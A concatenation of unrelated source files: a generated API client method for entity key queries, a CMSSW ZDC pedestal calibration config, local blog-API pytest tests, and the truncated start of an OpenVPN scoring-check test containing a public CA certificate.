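        "fetchLastLevelOnly": True,
        "relationType": "Contains",
        "deviceTypes": ["Air Quality Sensor", "Charging port"],
    },
    "entityFields": [{"type": "ENTITY_FIELD", "key": "name"}],
    "pageLink": {"pageSize": 10, "page": 0},
}

# Hypothetical wiring (requires a configured api_client carrying an
# X-Authorization JWT; 'api' is an instance of this controller class):
# page_data = api.find_entity_data_by_query_using_post(body=entity_data_query)
# thread = api.find_entity_data_by_query_using_post(body=entity_data_query,
#                                                   async_req=True)
# page_data = thread.get()
```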
def find_entity_timeseries_and_attributes_keys_by_query_using_post(self, timeseries, attributes, **kwargs): # noqa: E501
"""Find Entity Keys by Query # noqa: E501
Uses entity data query (see 'Find Entity Data by Query') to find first 100 entities. Then fetch and return all unique time-series and/or attribute keys. Used mostly for UI hints. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_entity_timeseries_and_attributes_keys_by_query_using_post(timeseries, attributes, async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool timeseries: Include all unique time-series keys to the result. (required)
:param bool attributes: Include all unique attribute keys to the result. (required)
:param EntityDataQuery body:
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.find_entity_timeseries_and_attributes_keys_by_query_using_post_with_http_info(timeseries, attributes, **kwargs) # noqa: E501
else:
(data) = self.find_entity_timeseries_and_attributes_keys_by_query_using_post_with_http_info(timeseries, attributes, **kwargs) # noqa: E501
return data
def find_entity_timeseries_and_attributes_keys_by_query_using_post_with_http_info(self, timeseries, attributes, **kwargs): # noqa: E501
"""Find Entity Keys by Query # noqa: E501
Uses entity data query (see 'Find Entity Data by Query') to find first 100 entities. Then fetch and return all unique time-series and/or attribute keys. Used mostly for UI hints. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_entity_timeseries_and_attributes_keys_by_query_using_post_with_http_info(timeseries, attributes, async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool timeseries: Include all unique time-series keys to the result. (required)
:param bool attributes: Include all unique attribute keys to the result. (required)
:param EntityDataQuery body:
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['timeseries', 'attributes', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method find_entity_timeseries_and_attributes_keys_by_query_using_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'timeseries' is set
if ('timeseries' not in params or
params['timeseries'] is None):
raise ValueError("Missing the required parameter `timeseries` when calling `find_entity_timeseries_and_attributes_keys_by_query_using_post`") # noqa: E501
# verify the required parameter 'attributes' is set
if ('attributes' not in params or
params['attributes'] is None):
raise ValueError("Missing the required parameter `attributes` when calling `find_entity_timeseries_and_attributes_keys_by_query_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'timeseries' in params:
query_params.append(('timeseries', params['timeseries'])) # noqa: E501
if 'attributes' in params:
query_params.append(('attributes', params['attributes'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/entitiesQuery/find/keys{?attributes,timeseries}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
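A small wrapper can make the two required boolean flags of the key-hints endpoint above self-documenting at call sites. Sketch only: the `api` argument is assumed to be an instance of the controller class containing these methods.

```python
def fetch_key_hints(api, query_body, timeseries=True, attributes=True):
    # Delegates to the generated method: 'timeseries' and 'attributes' are
    # the two required positional booleans, 'query_body' the EntityDataQuery
    # dict used to select the first 100 matching entities.
    return api.find_entity_timeseries_and_attributes_keys_by_query_using_post(
        timeseries,
        attributes,
        body=query_body,
    )
```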
# --- RecoHI/ZDCRecHit/python/ZDC2018Pedestal_cfg.py (repo: flodamas/cmssw, license: Apache-2.0) ---
import FWCore.ParameterSet.Config as cms
# Manual Pedestal calibration
# all 0
ZDC2018Pedestal_0 = cms.VPSet(
cms.PSet(
object = cms.untracked.string('hZDCM_EM0'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM1'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM2'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM3'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM4'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM5'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM6'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM7'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM8'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM9'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM10'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM11'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM12'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM13'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM14'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM15'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD0'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD1'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD2'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD3'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD4'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD5'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD6'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD7'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD8'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD9'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD10'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD11'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD12'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD13'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD14'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD15'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM0'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM1'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM2'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM3'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM4'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM5'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM6'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM7'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM8'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM9'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM10'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM11'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM12'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM13'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM14'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM15'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD0'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD1'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD2'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD3'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD4'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD5'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD6'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD7'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD8'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD9'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD10'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD11'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD12'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD13'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD14'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD15'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD0'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD1'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD2'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD3'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD4'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD5'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD6'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD7'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD8'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD9'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD10'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD11'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD12'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD13'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD14'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD15'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD0'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD1'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD2'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD3'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD4'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD5'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD6'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD7'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD8'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD9'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD10'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD11'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD12'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD13'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD14'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD15'),
ped = cms.untracked.vdouble(0.,0.,0.,0.)
)
)
# 904 uHTR slot 12, QIE #5 in slot 4, #6 in slot 10
# emap: ZDC904_emap_ext12.txt
# run: 1000031442
ZDC2018Pedestal_904_ext12 = cms.VPSet(
cms.PSet(
object = cms.untracked.string('hZDCM_EM1'),
ped = cms.untracked.vdouble(15.6083, 15.2689, 14.768, 13.3416)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM2'),
ped = cms.untracked.vdouble(9.41336, 12.1918, 8.21728, 9.76649)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM3'),
ped = cms.untracked.vdouble(13.4873, 12.7648, 14.5413, 14.8814)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM4'),
ped = cms.untracked.vdouble(14.7575, 14.451, 17.1683, 14.8702)
),
cms.PSet(
object = cms.untracked.string('hZDCM_EM5'),
ped = cms.untracked.vdouble(14.6055, 14.7122, 14.2617, 16.7126)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD1'),
ped = cms.untracked.vdouble(15.0058, 12.404, 14.7046, 14.1515)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD2'),
ped = cms.untracked.vdouble( 14.95, 16.1148, 12.2919, 14.3467)
),
cms.PSet(
object = cms.untracked.string('hZDCM_HAD3'),
ped = cms.untracked.vdouble(10.8538, 12.112, 11.3263, 10.7855)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM1'),
ped = cms.untracked.vdouble(15.9358, 10.4533, 12.7106, 11.5529)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM2'),
ped = cms.untracked.vdouble(14.7899, 14.5666, 11.2359, 13.4967)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM3'),
ped = cms.untracked.vdouble(17.0179, 14.5213, 11.5068, 15.5748)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM4'),
ped = cms.untracked.vdouble(13.6099, 11.9383, 11.2673, 16.4173)
),
cms.PSet(
object = cms.untracked.string('hZDCP_EM5'),
ped = cms.untracked.vdouble(14.3384, 13.0884, 10.5253, 14.6361)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD1'),
ped = cms.untracked.vdouble(13.8815, 11.5781, 11.2892, 15.7391)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD2'),
ped = cms.untracked.vdouble(14.4749, 12.8443, 14.8394, 14.4989)
),
cms.PSet(
object = cms.untracked.string('hZDCP_HAD3'),
ped = cms.untracked.vdouble(9.06214, 8.06979, 8.12848, 8.59083)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD0'),
ped = cms.untracked.vdouble(21.8017, 16.7815, 21.5617, 17.7388)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD1'),
ped = cms.untracked.vdouble(15.3408, 16.7762, 14.4841, 16.6738)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD2'),
ped = cms.untracked.vdouble(14.2779, 10.0383, 13.255, 10.5414)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD3'),
ped = cms.untracked.vdouble(18.5859, 17.8428, 16.9534, 15.3126)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD4'),
ped = cms.untracked.vdouble(15.1648, 14.6349, 17.8611, 14.5332)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD5'),
ped = cms.untracked.vdouble(14.0309, 14.4929, 13.9492, 11.177)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD6'),
ped = cms.untracked.vdouble(15.1696, 13.4929, 14.924, 14.5378)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD7'),
ped = cms.untracked.vdouble(15.1128, 14.6979, 13.8887, 17.6131)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD8'),
ped = cms.untracked.vdouble(17.8935, 13.9952, 15.6243, 17.344)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD9'),
ped = cms.untracked.vdouble(20.2393, 19.2369, 14.9737, 20.3862)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD10'),
ped = cms.untracked.vdouble(12.0221, 14.3521, 11.9133, 16.073)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD11'),
ped = cms.untracked.vdouble(16.3644, 14.3827, 15.6325, 14.0836)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD12'),
ped = cms.untracked.vdouble(15.4127, 15.1099, 14.5655, 14.3548)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD13'),
ped = cms.untracked.vdouble(11.6072, 11.7433, 10.4341, 14.684)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD14'),
ped = cms.untracked.vdouble(18.1413, 20.189, 20.5513, 17.6956)
),
cms.PSet(
object = cms.untracked.string('hZDCM_RPD15'),
ped = cms.untracked.vdouble(20.4136, 21.183, 17.9832, 20.5295)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD0'),
ped = cms.untracked.vdouble(15.6852, 17.5086, 18.0853, 14.7496)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD1'),
ped = cms.untracked.vdouble(12.9077, 14.6858, 11.524, 13.0808)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD2'),
ped = cms.untracked.vdouble(19.4074, 16.9448, 17.4224, 18.4837)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD3'),
ped = cms.untracked.vdouble(15.9245, 14.3199, 14.6333, 13.8805)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD4'),
ped = cms.untracked.vdouble(17.3613, 13.8852, 17.6593, 18.1441)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD5'),
ped = cms.untracked.vdouble(16.0604, 16.2478, 16.3608, 17.1693)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD6'),
ped = cms.untracked.vdouble(14.5853, 14.5886, 12.986, 14.681)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD7'),
ped = cms.untracked.vdouble(14.7179, 14.837, 14.9085, 14.705)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD8'),
ped = cms.untracked.vdouble(8.19399, 11.4826, 8.32948, 12.3732)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD9'),
ped = cms.untracked.vdouble(12.0351, 10.728, 11.0728, 9.61176)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD10'),
ped = cms.untracked.vdouble(14.5537, 16.2121, 17.6692, 16.0103)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD11'),
ped = cms.untracked.vdouble(14.6294, 11.0007, 11.5597, 11.4046)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD12'),
ped = cms.untracked.vdouble(13.0648, 11.9332, 11.3372, 12.6258)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD13'),
ped = cms.untracked.vdouble(17.3754, 16.8414, 17.645, 15.86)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD14'),
ped = cms.untracked.vdouble(17.9211, 15.1678, 17.6351, 17.8983)
),
cms.PSet(
object = cms.untracked.string('hZDCP_RPD15'),
ped = cms.untracked.vdouble(14.7133, 15.586, 14.0089, 16.6532)
)
)
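Both pedestal tables above repeat one PSet pattern per channel, and the all-zero table enumerates every side/section/channel combination. If that table ever needs regenerating, the channel names can be produced in a loop. A sketch (the name enumeration mirrors the entries above; the commented VPSet construction assumes the `cms` import at the top of this file):

```python
def zdc_channel_names():
    # Enumerate channel names in the same order as ZDC2018Pedestal_0 above:
    # minus-side EM/HAD, plus-side EM/HAD, then RPD for both sides,
    # with 16 channels per side/section pair.
    order = [("M", "EM"), ("M", "HAD"), ("P", "EM"), ("P", "HAD"),
             ("M", "RPD"), ("P", "RPD")]
    return ["hZDC%s_%s%d" % (side, section, ch)
            for side, section in order for ch in range(16)]

# With FWCore available, the all-zero table could be rebuilt as:
# ZDC2018Pedestal_0 = cms.VPSet(*[
#     cms.PSet(object=cms.untracked.string(name),
#              ped=cms.untracked.vdouble(0., 0., 0., 0.))
#     for name in zdc_channel_names()])
```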
# --- tests/test_1.py (repo: PhilipHarries/webms_blogservice, license: MIT) ---
# import pytest
import requests
localport = 5434
def test_get_blogs():
payload = {
"description": "desc",
"title": "title",
"author": "author",
"content": "content",
"id": "test_post_blog_1",
"tags": "test"
}
r = requests.post("http://localhost:{}/blog/api/v1.0/blogs".format(localport), json=payload)
r = requests.get("http://127.0.0.1:{}/blog/api/v1.0/blogs".format(localport))
assert r.status_code == 200
assert "blogs" in r.json()
assert len(r.json()["blogs"]) > 0
assert "author" in r.json()["blogs"][0]
assert "title" in r.json()["blogs"][0]
assert "id" in r.json()["blogs"][0]
assert "description" in r.json()["blogs"][0]
assert "content" in r.json()["blogs"][0]
assert "tags" in r.json()["blogs"][0]
assert "last-update" in r.json()["blogs"][0]
assert "created-date" in r.json()["blogs"][0]
def test_post_and_get_and_update_and_delete_blog():
payload = {
"description": "desc",
"title": "title",
"author": "author",
"content": "content",
"id": "test_post_blog_2",
"tags": "test"
}
r = requests.post("http://localhost:{}/blog/api/v1.0/blogs".format(localport), json=payload)
assert r.status_code == 201
assert r.json()["blog"]["description"] == "desc"
assert r.json()["blog"]["author"] == "author"
assert r.json()["blog"]["content"] == "content"
assert r.json()["blog"]["id"] == "test_post_blog_2"
assert r.json()["blog"]["tags"] == "test"
assert r.json()["blog"]["title"] == "title"
assert "created-date" in r.json()["blog"]
assert "last-update" in r.json()["blog"]
assert "uri" in r.json()["blog"]
r = requests.get("http://localhost:{}/blog/api/v1.0/blog/test_post_blog_2".format(localport))
assert r.status_code == 200
assert r.json()["blog"]["description"] == "desc"
assert r.json()["blog"]["author"] == "author"
assert r.json()["blog"]["content"] == "content"
assert r.json()["blog"]["id"] == "test_post_blog_2"
assert r.json()["blog"]["tags"] == "test"
assert r.json()["blog"]["title"] == "title"
assert "created-date" in r.json()["blog"]
assert "last-update" in r.json()["blog"]
assert "uri" in r.json()["blog"]
payload = {
"description": "desc",
"title": "title",
"author": "author",
"content": "new content",
"id": "test_post_blog_2",
"tags": "test"
}
r = requests.put("http://localhost:{}/blog/api/v1.0/blog/test_post_blog_2".format(localport), json=payload)
assert r.status_code == 200
r = requests.get("http://localhost:{}/blog/api/v1.0/blog/test_post_blog_2".format(localport))
assert r.status_code == 200
assert r.json()["blog"]["content"] == "new content"
r = requests.delete("http://localhost:{}/blog/api/v1.0/blog/test_post_blog_2".format(localport))
assert r.status_code == 200
r = requests.get("http://localhost:{}/blog/api/v1.0/blog/test_post_blog_2".format(localport))
assert r.status_code == 404
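The base URL repeated throughout these tests could be built by a small helper; a minimal sketch (the `/blog/api/v1.0` prefix and the `localport` value come from the tests above, the helper itself is hypothetical):

```python
# Hypothetical helper mirroring the URL pattern used in the tests above;
# `localport` is the port of the locally running blog server under test.
def blog_url(localport, path=""):
    return "http://localhost:{}/blog/api/v1.0{}".format(localport, path)
```

With it, the CRUD calls above collapse to `requests.get(blog_url(localport, "/blog/test_post_blog_2"))` and so on.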
# --- tests/scoring_engine/checks/test_openvpn.py (Dieff/scoringengine, MIT License) ---
from scoring_engine.engine.basic_check import CHECKS_BIN_PATH

from tests.scoring_engine.checks.check_test import CheckTest
class TestOpenVPNCheck(CheckTest):
check_name = 'OpenVPNCheck'
properties = {
'ca': "MIIDSzCCAjOgAwIBAgIUNf7YivHK0rWciIy1HsNNx/tGDt4wDQYJKoZIhvcNAQELBQAwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMTkwMjE1MDI0NzUyWhcNMjkwMjEyMDI0NzUyWjAWMRQwEgYDVQQDDAtFYXN5LVJTQSBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKCNXjK+4bIikgmGoGZHWRmLoJRxPoBkuy2U1jkaADBrfg4b3CgLP/OV4PGv1SmCvvLMuvdwKjA9JnYgtbEWLYyOi/Kxssjm5nLpJbx6KBZOvRjVzoKO0ljNh5nAXDiOyR+2PBUgp7A3PImM4R05m5pi+jd8+WbrQ8nfNQ5o9bFX26WpvWHo7gTxT8u+e6nL25U6TUYrPuTbw2/PGylaOVlEZTFhDO1GgxUUuPAwAmloQSoAbSNTI6Ch2mE8c3/dyyf4E1m6x7ves2cV44KQv8wTkLi1vQlhILmsjyH5oxlZARFl/hWXo6EBodLKVtVu8lWfNO4Le3qBYOijGfZQEB0CAwEAAaOBkDCBjTAdBgNVHQ4EFgQUG7NBOgwKvoAHZpwodZ45wVhpuUIwUQYDVR0jBEowSIAUG7NBOgwKvoAHZpwodZ45wVhpuUKhGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENBghQ1/tiK8crStZyIjLUew03H+0YO3jAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIBBjANBgkqhkiG9w0BAQsFAAOCAQEAXvwmtRzcLhdtJoNlK8Cc+BxjK9mgURgh4qt8BMP28CMfKw36xXWgxsbi4g5v08ohn+GrBikPmicL5p/V5yo6cC63Q0uI04k2k+jlC8PRXheyhQjYwSF6Ua18gAyXInR1GZ7t5l2OOBP5MWLGJxpLE8Xp1yn7v0kyAMXA3hOICi1BdS844ZVWhwiasm+BE7lybdtf15sAdYGmAjrrKwtCOlJSJrzOZLThUUlgGlwK2PAdeyYTkoQGyY3cKTfmsujTzyLsHKvqk7RPbKelvSfx1